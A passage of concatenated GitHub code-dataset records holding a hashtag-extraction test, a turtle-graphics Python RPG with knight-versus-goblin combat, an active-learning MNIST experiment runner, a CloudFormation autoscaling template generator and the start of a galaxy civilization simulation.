split-well!\",\n \"Another #example... of a #corpus #entry!! 
LOL\",\n ]\n result = pd.Series(\n [[\"#this\", \"#example\"], [\"#example\", \"#corpus\", \"#entry\"]], name=\"keyword\"\n )\n network_builder._extract_from_corpus(by=\"hashtag\")\n\n assert (result == network_builder.data[\"keyword\"]).all()\n","repo_name":"arabinelli/twitter-semantic-graph-backend","sub_path":"test/test_network_builder.py","file_name":"test_network_builder.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73714756674","text":"# Text based Dungeons and Dragons game\n\n# --------------ATTRIBUTE DEFINITION------------------------------------------------------------------------------------\n# health: low 250 - 3500 high\n# armour: (armour value regarding health point protection/ dmg mitigation) 0-100\n# weapon: (weapon description) string -> maybe weapon specific attributes\n# dmg: (damage per hit) will be a range and maybe light and heavy attacks (30% stronger but hight dodge chance for enemy)\n# agility: (ability to dodge attacks/debuffs) in %\n# charisma: (ability to convince and lead) 0 - 10\n# --------------------- PERSONAS ---------------------------------------------------------------------------------------\n# Narrator - provides verbal Feedback of the game progress, fight progression, environment etc.\n# class names - provides verbal Feedback for it's own persona\n# -------------------- ATTACKS -----------------------------------------------------------------------------------------\n# light dmg: 2/3 of heavy\n# heavy dmg: reference\n# crit dmg: double\n\n# ------------------- IMPORTS --------------------------------------\nimport random\nimport time\nimport turtle\nimport tkinter\n\n\n# ------------------------------------------------------------------\n\n# chance to break armour / mitigation in regards to attack type\n\ndef init_attack(hero, npc, pen_object): # takes the object names\n\n #### INPUT listener -> key for light attack and so on\n print(\"--------------ENCOUNTER---------------\")\n print(str(hero.name) + \" VS \" + str(npc.__class__.__name__))\n attacker_attacks = hero.attacks()\n defender_attacks = npc.attacks()\n init_hero_pos = hero.position()\n init_npc_pos = npc.position()\n pen_object_shape = pen_object.shape()\n hero.up()\n hero.setheading(0)\n npc.up()\n npc.setheading(180)\n pen_object.color(\"white\")\n pen_object.up()\n\n\n dmg_pos = (0, 200)\n hit_pos = (0, 170)\n dodge_pos = (0, 140)\n crit_pos = (0, 110)\n pen_object.setpos(dmg_pos)\n\n order = [hero, npc]\n\n if npc.agility >= hero.agility:\n order = list(reversed(order)) # reverse provides a reversed iterator, not a reversed list! -> list()\n\n round_counter = 0\n while hero.health and npc.health > 0:\n round_counter += 1\n print(\"Round {}: {} attacks {}\".format(round_counter, order[0].name, order[1].name))\n if order[0].__class__.__name__ in Setup.char_list: # check if it's the turn of the hero or the npc\n print(\"Narrator: Choose your action: \")\n for i, attack in enumerate(order[0].attacks()):\n print(\"{}. {}\".format(int(i + 1), attack[0]))\n print(\"{}. 
Try to escape\".format(i + 2))\n\n while True:\n action = input(\"Enter the chosen number: \")\n if action.isdigit() and int(action) in list(range(1, len(order[0].attacks())+1)):\n break\n else:\n print(\"Please enter a valid number\")\n if int(action) != i + 2:\n result_tuple = order[1].getAttacked(order[0].attacks()[int(action) - 1], pen_object)\n print(\"-------------------------------\")\n elif int(action) == i + 2: # handling escape action\n pass\n\n else:\n action = random.randint(0, 1)\n result_tuple = order[1].getAttacked(order[0].attacks()[int(action)], pen_object)\n print(\"-------------------------------\")\n # Attack movement\n order[0].fd(500)\n time.sleep(0.2)\n order[0].bk(500)\n\n if result_tuple[0] == False:\n pen_object.setpos(hit_pos)\n pen_object.write(\"MISS\", font=(\"Arial\", 30, \"normal\"))\n elif result_tuple[1] == True:\n pen_object.setpos(dodge_pos)\n pen_object.write(\"DODGED\", font=(\"Arial\", 30, \"normal\"))\n elif result_tuple[3] != None:\n pen_object.setpos(dmg_pos)\n pen_object.write(str(round(result_tuple[3])), font=(\"Arial\", 30, \"normal\"))\n\n if result_tuple[2] == True:\n pen_object.color(\"red\")\n pen_object.setpos(crit_pos)\n pen_object.write(\"CRITICAL HIT!\", font=(\"Arial\", 30, \"normal\"))\n pen_object.color(\"white\")\n\n\n if result_tuple[4] == True: #set armour break symbol\n pen_object.ht()\n pen_object.setpos(order[1].position()[0], order[1].position()[1]+100)\n pen_object.st()\n pen_object.shape(\"armour_break_status.gif\")\n pen_object.stamp()\n pen_object.ht()\n\n if hero.health <= 0:\n screen.done()\n pass\n\n time.sleep(2)\n pen_object.clear()\n pen_object.shape(pen_object_shape)\n order = list(reversed(order))\n\n if npc.health <= 0:\n for i in range(5):\n npc.ht()\n time.sleep(0.15)\n npc.st()\n time.sleep(0.15)\n npc.ht()\n Draw.redraw(object_handler.current_screens[0], False)\n object_handler.current_screens[0].bgcolor(\"green\")\n hero.shape(\"classic\")\n hero.setpos(Move.hero_pos_before_enc[0], Move.hero_pos_before_enc[1])\n Move.encounter = False\n\n# --------------------------------------------------------------\nclass Draw: # building of a 2D array (map) with every tile having specific attributes (enemies, forest, plain, etc.)\n\n pen = turtle.Turtle() # turtle for drawing\n list_tree = []\n list_grass = []\n list_potions = {} # stamp_id and print location\n kill_display_pos = (-320, 180)\n font_size = 40\n\n @staticmethod\n def tree(pen):\n circle_size = 40\n circle_color = \"#32A962\"\n pen.color(\"brown\", \"brown\")\n pen.pensize(4)\n pen.fd(20)\n pen.up()\n pen.bk(10)\n pen.down()\n pen.left(90)\n pen.fd(65)\n pos = pen.position()\n\n pen.up()\n pen.setpos(int(pos[0]) - random.randint(2, 8), int(pos[1]) - random.randint(17, 23))\n pen.down()\n pen.dot(circle_size, circle_color)\n\n pen.up()\n pen.setpos(int(pos[0]) + random.randint(2, 8), int(pos[1]) - random.randint(17, 23))\n pen.down()\n pen.dot(circle_size, circle_color)\n\n pen.up()\n pen.setpos(int(pos[0]) - random.randint(-1, 6), int(pos[1]) + random.randint(-2, 2))\n pen.down()\n pen.dot(circle_size, circle_color)\n pen.up()\n\n pen.setpos(int(pos[0]) + random.randint(0, 6), int(pos[1]) + random.randint(-2, 2))\n pen.down()\n pen.dot(circle_size, circle_color)\n pen.up()\n\n pen.setpos(int(pos[0] + random.randint(-2, 2)), int(pos[1]) + random.randint(2, 8))\n pen.down()\n pen.dot(circle_size, circle_color)\n pen.up()\n\n pen.right(90)\n\n @staticmethod\n def grass(pen):\n start_pos = pen.position()\n pen.color(\"#8AFFB9\", \"#8AFFB9\")\n pen.pensize(5)\n 
pen.setheading(90)\n pen.circle(10, 100)\n pen.up()\n pen.setpos(start_pos)\n pen.down()\n pen.setheading(90)\n pen.fd(15)\n pen.up()\n pen.setpos(start_pos)\n pen.down()\n pen.setheading(90)\n pen.circle(-10, 100)\n pen.setheading(0)\n\n @classmethod\n def potion(cls, pen):\n potion_location = pen.position()\n pen.pensize(15)\n pen.color(\"#980000\", \"#D44A4A\")\n stamp_ID = pen.stamp()\n cls.list_potions[stamp_ID] = potion_location\n\n # print letters HP\n pen.up()\n pen.setpos(potion_location[0] - 5, potion_location[1] - 8)\n pen.down()\n text = \"HP\"\n pen.pencolor(\"white\")\n pen.write(text)\n return cls.list_potions\n\n @classmethod\n def redraw(cls, canvas, encounter):\n print(\"Redrawing...\")\n pen = cls.pen\n t = canvas.tracer()\n canvas.tracer(0, 0) # turns off turtle animation\n pen.clear()\n\n if encounter == False:\n\n pen.up()\n pen.setpos(-350, -250)\n pen.down()\n pen.color(\"Black\")\n for border in range(2):\n pen.fd(700)\n pen.left(90)\n pen.fd(500)\n pen.left(90)\n\n for grass in cls.list_grass:\n pen.up()\n pen.setpos(grass[0], grass[1])\n pen.down()\n cls.grass(pen)\n\n for tree in cls.list_tree:\n pen.up()\n pen.setpos(tree[0], tree[1])\n pen.down()\n cls.tree(pen)\n\n for key in list(cls.list_potions):\n pen.up()\n pos = cls.list_potions[key]\n pen.setpos(pos[0], pos[1])\n pen.down()\n cls.potion(pen)\n del cls.list_potions[key]\n cls.kill_display()\n canvas.update()\n canvas.tracer(t, 0)\n\n else:\n cls.encounter(encounter, canvas, t)\n\n @classmethod\n def environment(cls, canvas): # canvas is passed screen object, draws map\n print(\"Draw environment\")\n cls.list_tree = []\n cls.list_grass = []\n cls.list_potions = {}\n pen = cls.pen\n # pen = object_handler.current_heros[0] <- actual code\n pen.speed(0) # highest speed\n t = canvas.tracer()\n canvas.tracer(0, 0) # turns off turtle animation\n pen.shape(\"circle\")\n pen.pensize(10)\n pen.up()\n pen.setpos(-350, -250)\n pen.down()\n\n for border in range(2):\n pen.fd(700)\n pen.left(90)\n pen.fd(500)\n pen.left(90)\n\n for grass in range(random.randint(90, 120)):\n # print(\"Printing grass\")\n pen.up()\n grass_pos = (random.uniform(-325, 325), random.uniform(-240, 232))\n cls.list_grass.append(grass_pos)\n pen.setpos(grass_pos[0], grass_pos[1])\n pen.down()\n Draw.grass(pen)\n\n for tree in range(random.randint(10, 15)):\n # print(\"Printing trees\")\n pen.up()\n tree_pos = (random.uniform(-325, 325), random.uniform(-240, 232))\n cls.list_tree.append(tree_pos)\n pen.setpos(tree_pos[0], tree_pos[1])\n pen.down()\n Draw.tree(pen)\n\n for potion in range(3):\n pen.up()\n pen.setpos(random.uniform(-325, 325), random.uniform(-240, 232))\n pen.down()\n cls.list_potions = cls.potion(pen)\n print(str(cls.list_potions))\n\n pen.ht()\n\n cls.kill_display()\n\n canvas.update() # refreshes while tracer (animation turned off) was active\n canvas.tracer(t, 0) # back to original refresh rate\n\n @classmethod\n def encounter(cls, encounter, canvas, original_tracer):\n pen = cls.pen\n hero_startPos = (-300, -197)\n goblin_startPos = (300, -142)\n\n hero = object_handler.current_heros[0]\n hero.shape(\"pixel_knight.gif\")\n hero.up()\n hero.setpos(hero_startPos)\n\n goblin = Goblin()\n goblin.shape(\"pixel_goblin.gif\")\n goblin.up()\n goblin.setpos(goblin_startPos)\n\n pen.up()\n pen.setpos(-190, 0)\n pen.down()\n\n canvas.update()\n canvas.tracer(original_tracer, 0)\n # inital encounter drawing\n for flicker in range(5):\n canvas.bgcolor(\"White\")\n pen.write(\"ENCOUNTER\", font=(\"Arial\", cls.font_size, \"normal\"))\n 
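`Draw.redraw` and `Draw.environment` above wrap their drawing in `canvas.tracer(0, 0)` ... `canvas.update()` to batch many turtle strokes into one repaint. The idiom in isolation (requires a display, like the record itself):

```python
import turtle

screen = turtle.Screen()
saved = screen.tracer()            # remember the current animation setting
screen.tracer(0, 0)                # turn animation off while drawing...
pen = turtle.Turtle()
for _ in range(36):
    pen.circle(80)
    pen.left(10)
screen.update()                    # ...then flush everything in one repaint
screen.tracer(saved, 0)
```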
time.sleep(0.1)\n canvas.bgcolor(\"Black\")\n pen.write(\"ENCOUNTER\", font=(\"Arial\", cls.font_size, \"normal\"))\n time.sleep(0.1)\n\n while encounter == True:\n pen.clear()\n canvas.bgcolor(\"Black\")\n init_attack(hero, goblin, pen)\n\n time.sleep(2) # sets frame refresh speed - at least that's the idea\n break\n\n @classmethod\n def kill_display(cls):\n kills = int(object_handler.get_kills())\n pen = cls.pen\n pen.up()\n pen.setpos(cls.kill_display_pos[0], cls.kill_display_pos[1])\n pen.write(\"Kills: {}\".format(kills), font=(\"Arial\", cls.font_size, \"normal\"))\n pen.down()\n\nclass Character(turtle.Turtle): # character as a subclass of Turtle object mother-class\n\n armour_break_light = 100 #10\n armour_break_heavy = 100 #20\n armour_break_crit = 100 #50\n\n # critical hit adds 50% to the persistent chance\n\n def setWeapon(self):\n print(\"These are the possible weapons: \")\n for k, item in enumerate(self.weapons):\n print((\"{}. \" + item).format(k + 1))\n print(\"Enter the number of your choice\")\n\n while True:\n self.choice = input()\n try:\n self.choice.isdigit()\n (int(self.choice) - 1) in list(range(0, len(self.weapons)))\n break\n\n except:\n print(\"Enter valid number\")\n\n return self.choice\n\n def takePotion(self):\n self.health += 500\n print(\"Health increased by 500 to a total of {}\".format(self.health))\n\n def getAttacked(self, dmg_prop, pen_object):\n # dmg_prop is a tupel (type, lower_ranger, upper_range,\n # hit_chance, crit_rate, weapon), hit_chance is the hit probability of the enemy attack\n # determining hit by hit chance of enemy attack\n hit = False\n dodge = False\n crit = False\n t_dmg = None\n armour_break = False\n\n if random.randint(0, 100) > dmg_prop[3]: # it is hit chance therefore '>'\n print(\"Narrator: Attack missed!\")\n print()\n hit = False\n else:\n print(\"Narrator: Attack about to hit...\", end=\" \")\n time.sleep(1)\n # determining ability to dodge of this char\n if random.randint(0, 100) <= self.agility:\n print(\"but got dodged!\")\n dodge = True\n hit = False\n\n else:\n print(\"and was not dodged!\")\n dodge = False\n hit = True\n\n if hit == True and dodge == False:\n\n # determining a critical hit \n rand = random.randint(0, 100)\n print(\"Random number for crit: {}\".format(rand))\n print(\"Dmg_prop[0]: {}\".format(dmg_prop[0]))\n print(\"Dmg_prop[1]: {}\".format(dmg_prop[1]))\n print(\"Dmg_prop[2]: {}\".format(dmg_prop[2]))\n print(\"Dmg_prop[3]: {}\".format(dmg_prop[3]))\n print(\"Dmg_prop[4]: {}\".format(dmg_prop[4]))\n\n if rand <= dmg_prop[4]:\n crit = True\n print(\"Narrator: Critical hit!\")\n else:\n print(\"Narrator: No critical hit.\")\n\n # determining armour break\n print(\"dmg_prop[0]: {}\".format(dmg_prop[0]))\n if dmg_prop[0] == \"light\":\n if random.randint(0, 100) <= Character.armour_break_light:\n armour_break = True\n print(\"Narrator: Light attack broke the armour\")\n self.armour = self.armour * 0.75\n elif dmg_prop[0] == \"heavy\":\n if random.randint(0, 100) <= Character.armour_break_heavy:\n armour_break = True\n print(\"Narrator: Heavy attack broke the armour\")\n self.armour = self.armour * 0.75\n elif crit == True:\n if random.randint(0, 100) <= Character.armour_break_crit:\n armour_break = True\n print(\"Narrator: Critical {} attack broke the armour\".format(dmg_prop[0]))\n self.armour = self.armour * 0.75\n\n#--------------------final dmg calculation------------------------------------------\n\n if crit == True and hit == True:\n t_dmg = random.randint(dmg_prop[1], dmg_prop[2]) * ((100 - 
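`Character.getAttacked` above layers its randomness as hit roll, then dodge roll, then crit roll, then damage scaled by armour mitigation (doubled on a crit). Extracting that chain into a pure function makes it easy to test in isolation; a sketch mirroring the record's order and formulas:

```python
import random

def resolve_attack(hit_chance, dodge_chance, crit_chance, low, high, armour):
    # hit roll -> dodge roll -> crit roll -> damage, as in getAttacked above.
    if random.randint(0, 100) > hit_chance:
        return ('miss', 0)
    if random.randint(0, 100) <= dodge_chance:
        return ('dodged', 0)
    crit = random.randint(0, 100) <= crit_chance
    dmg = random.randint(low, high) * ((100 - armour) / 100)
    return ('crit' if crit else 'hit', dmg * 2 if crit else dmg)

random.seed(1)
print(resolve_attack(85, 15, 30, 500, 750, 10))
```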
self.armour) / 100) * 2 # double crit dmg + deduct the armour mitigation value\n elif crit == False and hit == True:\n t_dmg = random.randint(dmg_prop[1], dmg_prop[2]) * ((100 - self.armour) / 100)\n\n print(\"Narrator: Damage inflicted: \" + str(int(t_dmg)))\n self.health -= t_dmg\n if self.health > 0:\n print(\n \"Narrator: Remaining health of \" + str(self.__class__.__name__) + \" \" + str(self.name) + \": \" + str(\n int(self.health)))\n print(\n \"Narrator: Remaining armour of \" + str(self.__class__.__name__) + \" \" + str(self.name) + \": \" + str(\n int(self.armour)))\n print(str(__class__.__name__) + \" \" + str(self.name) + \": \" + self.phrases[\n random.randint(0, len(self.phrases) - 1)])\n else:\n print(\"{} received fatal damage!!!\".format(self.name))\n object_handler.kill_counter(self.__class__.__name__)\n\n return (hit, dodge, crit, t_dmg, armour_break) # t_dmg = total resulting damage\n\n\nclass Knight(Character):\n health = 2000\n armour = 50\n agility = 15\n charisma = 8\n dmg = 10 # setWeapon defines dmg according to weapon chosen\n hit_c = 30 # setWeapon defines hit chance according to weapon chosen\n crit_c = 30 # 5 setWeapon defines critical hit chance according to weapon chosen\n\n weapons = (\"longsword\", \"shield and sword\")\n phrases = (\"Deus Vult!\", \"Come here you infidel!\", \"Let me bring you justice!\", \"For the holy land\",\n \"God be my witness as I slay this abstorsity!\")\n\n # possible weapons: longsword, shield and one-handed sword\n\n def __init__(self, name=\"Holy Crusader\", *args, **kwargs):\n self.name = name\n self.setWeapon()\n super(Knight, self).__init__(*args,\n **kwargs) # executes the turtle __init__ and makes the knight object able to do everyting turtle does :DD\n\n # ---------------------------- ACTIONS ------------------------------------------------------------\n def setWeapon(self):\n self.choice = super(Knight, self).setWeapon()\n\n if self.choice == \"1\":\n self.weapon = \"longsword\"\n self.dmg = (500, 750)\n self.agility -= 5\n self.hit_c = 100 #85\n self.crit_c = 100 #30\n\n elif self.choice == \"2\":\n self.weapon = \"shield and sword\"\n self.dmg = (300, 450)\n self.armour += 10\n self.hit_c = 100 #90\n self.crit_c = 100 #25\n else:\n print(\"no weapon set\")\n\n print((\"{} successfully equiped\").format(self.weapon))\n\n def attacks(self):\n light = (\"light\", self.dmg[0], int(((self.dmg[1] - self.dmg[0]) / 2) + self.dmg[0]), self.hit_c, self.crit_c,\n self.weapon)\n heavy = (\"heavy\", int(((self.dmg[1] - self.dmg[0]) / 2) + self.dmg[0]), self.dmg[1], self.hit_c, self.crit_c,\n self.weapon)\n\n return (light, heavy)\n\n\nclass Goblin(Character):\n health = 1250\n armour = 10\n agility = 0 #20-30\n charisma = 1\n dmg = 10 # setWeapon defines dmg according to weapon chosen\n hit_c = 10 # setWeapon defines hit chance according to weapon chosen\n crit_c = 5 # setWeapon defines critical hit chance according to weapon chosen\n\n weapons = (\"dual dagger\")\n phrases = (\"Arrrrrgg!\", \"Brains and flesh!\", \"Lemme smash!\")\n\n def __init__(self, name=\"Filth\"):\n self.name = name\n self.setWeapon()\n super(Goblin,\n self).__init__() # executes the turtle __init__ and makes the knight object able to do everyting turtle does :DD\n\n # ---------------------------- ACTIONS ------------------------------------------------------------\n def setWeapon(self):\n self.weapon = \"dual daggers\"\n self.dmg = (250, 500)\n self.hit_c = 70\n self.crit_c = 40\n\n def attacks(self):\n light = (\"light\", self.dmg[0], int(((self.dmg[1] - 
self.dmg[0]) / 2) + self.dmg[0]), self.hit_c, self.crit_c,\n self.weapon)\n heavy = (\"heavy\", int(((self.dmg[1] - self.dmg[0]) / 2) + self.dmg[0]), self.dmg[1], self.hit_c, self.crit_c,\n self.weapon)\n\n return (light, heavy)\n\n\n# ----------------------------------------Initiation and Object handling-----------------------------------------------\nclass object_handler: # class not meant to be instantiated, no (self)\n current_heros = []\n current_NPC = []\n current_screens = []\n total_kills = 0\n goblin_kills = 0\n # here add new npc's to distinguish kills\n\n @classmethod\n def get_kills(cls):\n return cls.total_kills\n\n @classmethod\n def kill_counter(cls, kill_type): #kill_type will be __class__.__name__ of the killed object\n if kill_type == Goblin.__name__: # was Goblin.__class__.__name__, which evaluates to 'type' and never matched\n cls.goblin_kills += 1\n\n cls.total_kills += 1\n\n @staticmethod\n def get_object_list():\n return (object_handler.current_heros, object_handler.current_NPC, object_handler.current_screens)\n\n # Question: does self belong in every method of a class even when object instances don't necessarily have to be created? How do you import classes into one another properly and use modules across files?\n def add_hero(new_hero):\n object_handler.current_heros.append(new_hero)\n # print(object_handler.current_heros[0].dmg)\n\n def add_NPC(new_NPC):\n object_handler.current_NPC.append(new_NPC)\n\n def add_screen(new_screen):\n object_handler.current_screens.append(new_screen)\n\n\n# ------------------------SETUP-----------------------\n\nclass Setup:\n char_list = [\"Knight\", \"Rouge\", \"Mage\"]\n\n def __init__(self):\n self.welcome()\n self.selectChar()\n # self.createNPC(10) easier to handle when created during encounter...\n\n def welcome(self):\n print(\"Welcome to 'Goblin Unslaught'\")\n # time.sleep(1)\n\n def selectChar(self):\n print(\"Please select one char with the corresponding number\")\n for counter, hero in enumerate(Setup.char_list):\n print(\"{}. {}\".format(counter + 1, hero))\n print(\"-------------------------------\")\n while True:\n self.selected_char = input()\n\n try:\n if (int(self.selected_char) - 1) in range(0, len(Setup.char_list)): # was a bare expression inside try/except, which never enforced the range\n break\n print(\"Please enter a valid number\")\n except ValueError:\n print(\"Please enter a valid number\")\n\n while True:\n\n char_name = str(input(\"Choose a name for your hero: \"))\n print(\"-------------------------------\")\n if len(char_name) > 0: # was a bare comparison inside try/except, which always fell through to break\n break\n print(\"Try again..\")\n\n if self.selected_char == \"1\":\n object_handler.add_hero(Knight(char_name))\n elif self.selected_char == \"2\":\n object_handler.add_hero(rouge(char_name))\n elif self.selected_char == \"3\":\n object_handler.add_hero(mage(char_name))\n\n def createNPC(self, amount): #for now the same Goblin spawns over and over. No need specifically to create multiple objects (same starting health?), but necessary once different NPCs are present -> a new handler for each object then\n
 self.amount = amount\n for npc in range(amount):\n object_handler.add_NPC(Goblin())\n print(\"Narrator: Be wary traveler, {} goblins spawned nearby!\".format(amount))\n return amount\n\n\nclass Move:\n step = 60 #40\n encounter = False\n hero_pos_before_enc = 0\n\n # class methods are static-like and, much as instances do through self, can address the class\n # level through cls -> step at class level could also have been reached with Move.step, but it is\n # cleaner to do it with the @classmethod decorator, since that addresses the class itself directly and\n # rules out wrong references.\n @classmethod\n def checkBorder(cls, hero):\n print(\"Checking border\")\n hero_pos = hero.position()\n if hero.heading() == 0:\n if hero_pos[0] + cls.step >= 345:\n hero.ht()\n Draw.environment(object_handler.current_screens[0])\n hero.setpos(-hero_pos[0], hero_pos[1])\n hero.st()\n\n else:\n hero.fd(cls.step)\n\n elif hero.heading() == 90:\n if hero_pos[1] + cls.step >= 245:\n hero.ht()\n Draw.environment(object_handler.current_screens[0])\n hero.setpos(hero_pos[0], -hero_pos[1])\n hero.st()\n\n else:\n hero.fd(cls.step)\n\n elif hero.heading() == 180:\n if hero_pos[0] - cls.step <= -345:\n hero.ht()\n Draw.environment(object_handler.current_screens[0])\n hero.setpos(abs(hero_pos[0]), hero_pos[1])\n hero.st()\n else:\n hero.fd(cls.step)\n\n elif hero.heading() == 270:\n if hero_pos[1] - cls.step <= -245:\n hero.ht()\n Draw.environment(object_handler.current_screens[0])\n hero.setpos(hero_pos[0], abs(hero_pos[1]))\n hero.st()\n else:\n hero.fd(cls.step)\n\n def checkPotion(hero):\n potions = Draw.list_potions\n print(\"Potions\" + str(potions))\n hit_potion = False\n for key in list(potions):\n if hero.distance(potions[key]) <= 25:\n print(\"Collision\")\n hit_potion = True\n # Draw.redraw(hit_potion, key)\n del potions[key]\n print(\"after del: \" + str(potions))\n object_handler.current_heros[0].takePotion()\n\n @classmethod\n def checkEncounter(cls):\n encounter_chance = 100\n if random.randint(0, 100) <= encounter_chance:\n cls.encounter = True\n cls.hero_pos_before_enc = object_handler.current_heros[0].position()\n\n @classmethod\n def basicMoveEvent(cls, hero, canvas):\n time.sleep(0.25)\n if cls.encounter == False:\n Move.checkBorder(hero)\n time.sleep(0.1)\n Move.checkPotion(hero)\n Move.checkEncounter()\n Draw.redraw(canvas, cls.encounter)\n else:\n # here goes the move list while in an encounter\n pass\n\n @classmethod\n def left(cls, hero, canvas):\n hero.setheading(180)\n cls.basicMoveEvent(hero, canvas)\n\n @classmethod\n def right(cls, hero, canvas):\n hero.setheading(0)\n cls.basicMoveEvent(hero, canvas)\n\n @classmethod\n def up(cls, hero, canvas):\n hero.setheading(90)\n cls.basicMoveEvent(hero, canvas)\n\n @classmethod\n def down(cls, hero, canvas):\n hero.setheading(270)\n cls.basicMoveEvent(hero, canvas)\n\n\ndef main():\n Setup()\n hero = object_handler.current_heros[0]\n hero.up()\n hero.setheading(90)\n hero.setpos(0, -150)\n screen = turtle.Screen()\n screen.screensize(700, 500)\n screen.setup(720, 520, 0, 0)\n screen.bgcolor(\"green\")\n\n shapes = [\"pixel_goblin.gif\", \"pixel_knight.gif\", \"armour_break_status.gif\"]\n\n for shape in shapes:\n print(\"{} {}\".format(shape, type(shape)))\n screen.register_shape(shape)\n # screen.register_shape(\"pixel_goblin.gif\")\n # screen.register_shape(\"pixel_knight.gif\")\n #screen.register_shape(\"armour_break_status.png\")\n # while 
True: #main loop\n # encounter = False\n Draw.environment(screen)\n\n # --------------Events--------------------------\n screen.onkey(lambda arg=hero, obj=screen: Move.up(arg, obj), \"Up\")\n screen.onkey(lambda arg=hero, obj=screen: Move.down(arg, obj), \"Down\")\n screen.onkey(lambda arg=hero, obj=screen: Move.left(arg, obj), \"Left\")\n screen.onkey(lambda arg=hero, obj=screen: Move.right(arg, obj), \"Right\")\n\n # if encounter == True:\n # Draw.encounter(screen)\n\n object_handler.add_screen(screen)\n\n screen.listen()\n screen.mainloop()\n\n\n # init_attack(object_handler.current_heros[0], object_handler.current_NPC[0])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Bellador/RPGame","sub_path":"DaD.py","file_name":"DaD.py","file_ext":"py","file_size_in_byte":28198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5961541927","text":"import os\nimport logging\nimport pickle\n\nimport numpy as np\n\nimport al\nfrom al.dataset import mnist\nfrom al.model.model_zoo.simple_cnn import ConvModel\nfrom al.model.mnist import MnistLearner\nfrom al.dataset.mnist import MnistDataset\nfrom al.train.active_train import ActiveTrain\nfrom al.helpers.experiment import set_up_experiment, load_config\nfrom al.experiments import set_up_learner\n\n\nFOLDER_PATH = os.path.dirname(__file__)\nOUTPUT_DIR, FIGURE_DIR, logger, logger_name = set_up_experiment(\n __file__, FOLDER_PATH, logging_lvl=20)\n\n\ndef experiment_with(dataset_name):\n config = load_config(FOLDER_PATH, dataset_name)\n setupper = set_up_learner(dataset_name)\n\n config['active_learning']['output_dir'] = OUTPUT_DIR\n config['experiment']['logger_name'] = logger_name\n model_name = config['experiment']['model']\n iterations_per_labeled_sample = config['experiment']['iterations_per_labeled_sample']\n size_to_label = config['experiment']['size_to_label']\n\n score_data = {}\n logger.info('---------------------------------------')\n logger.info(f'--LAUNCHING EXPERIMENTS ON {dataset_name}--')\n logger.info('---------------------------------------')\n for i in range(config['experiment']['repeats']):\n logger.info('---------------------------')\n logger.info(f'--------ROUND OF TRAININGS NUMBER #{i+1}--------')\n logger.info('---------------------------')\n for query_size in config['experiment']['query_sizes']:\n config['active_learning']['assets_per_query'] = query_size\n config['active_learning']['n_iter'] = np.ceil(\n size_to_label / query_size).astype(int)\n dataset, learner = setupper(\n config, OUTPUT_DIR, logger, queries_name=f'queries-{query_size}-{i}-{model_name}.txt')\n logger.info('---------------------------')\n logger.info(f'----QUERY SIZE : {query_size}----')\n logger.info('---------------------------')\n trainer = ActiveTrain(\n learner, dataset, config['experiment']['strategy'], logger_name)\n scores = trainer.train(\n config['train_parameters'], **config['active_learning'])\n score_data[(query_size, i)] = scores\n logger.info(f'----DONE----\\n')\n logger.info('---------------------------')\n logger.info(f'--------DONE--------')\n logger.info('---------------------------\\n\\n\\n')\n if config['experiment']['save_results']:\n with open(f'{OUTPUT_DIR}/scores-{dataset_name}-{model_name}.pickle', 'wb') as f:\n pickle.dump(score_data, f)\n\n\nif __name__ == '__main__':\n dataset = 'mnist'\n 
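 # --- Illustrative aside (not part of the original script above) ---
 # experiment_with() sizes the active-learning loop as n_iter = ceil(size_to_label / query_size).
 # A standalone sanity check of that formula with assumed numbers (-(-a // b) is integer ceiling division):
 assert -(-1000 // 100) == 10 # 1000 samples labeled 100 per query -> 10 iterations
 assert -(-1000 // 300) == 4 # 1000 samples labeled 300 per query -> 4 iterations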
experiment_with(dataset)\n","repo_name":"kili-technology/active-learning","sub_path":"experiments/query_size/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"28939546144","text":"import json\nimport yaml\nfrom myresources import autoscalinggroup, loadbalancer,parameter\nimport sys\n\n# Load requirements from YAML file\nwith open('asgtemplate2/autoscaling_requirements.yaml', 'r') as f:\n requirements = yaml.safe_load(f)\n print(requirements)\n# Define CloudFormation template structure\n# template = {\n# \"Parameters\" : parameter.get_resource(),\n# \"Resources\": {\n# \"MyAutoScalingGroup\": autoscalinggroup.get_resource(requirements),\n# \"MyLaunchTemplate\": autoscalinggroup.get_launch_configuration(requirements)\n# }\n# }\n\ntemplate = {\n \"Parameters\" : sys.argv[1],\n \"Resources\": {\n \"MyAutoScalingGroup\": autoscalinggroup.get_resource(requirements),\n \"MyLaunchTemplate\": autoscalinggroup.get_launch_configuration(requirements)\n }\n}\n\nprint(template)\n# Add Elastic Load Balancer resource and update launch configuration\nif requirements.get('load_balancer', {}).get('enabled', False):\n elb_resource = loadbalancer.get_resource(requirements)\n print(elb_resource)\n template['Resources']['ElasticLoadBalancer'] = elb_resource\n template['Resources']['MyLaunchTemplate']['Properties']['LoadBalancerNames'] = [{\"Ref\": \"ElasticLoadBalancer\"}]\n\n# Save CloudFormation template as JSON file\nwith open('asgtemplate2/autoscaling_template.json', 'w') as f:\n json.dump(template, f)\n\n# Output success message\nprint(\"CloudFormation template generated and saved as autoscaling_template.json\")\n\n\n","repo_name":"priyanka-ttn0/hello-world-maven","sub_path":"asgtemplate2/createresource.py","file_name":"createresource.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"34288414831","text":"#create a model of milkyway \nfrom random import randint #library for random choice\nfrom collections import Counter \nimport numpy as np \nimport matplotlib.pyplot as plt \n\nNUM_EQUIV_VOLUMES = 1000 #number of locations to place civs\nMAX_CIVS = 5000 #maximum number of advanced civs\nTRIALS = 1000 #number of times to model a given number of civs\nCIV_STEP_SIZE = 100 #civilizations count step\n\nx = [] # x values for polynomial fit\ny = [] #y values for polynomial fit\n\n# make a for loop\nfor num_civs in range(2, MAX_CIVS + 2, CIV_STEP_SIZE):\n civs_per_vol = num_civs / NUM_EQUIV_VOLUMES\n num_single_civs = 0\n for trial in range(TRIALS):\n locations = []\n while len(locations) < num_civs:\n location = randint(1, NUM_EQUIV_VOLUMES)\n locations.append(location)\n overlap_count = Counter(locations)\n overlap_rollup = Counter(overlap_count.values())\n num_single_civs += overlap_rollup[1]\n\n prob = 1 - (num_single_civs / (num_civs * 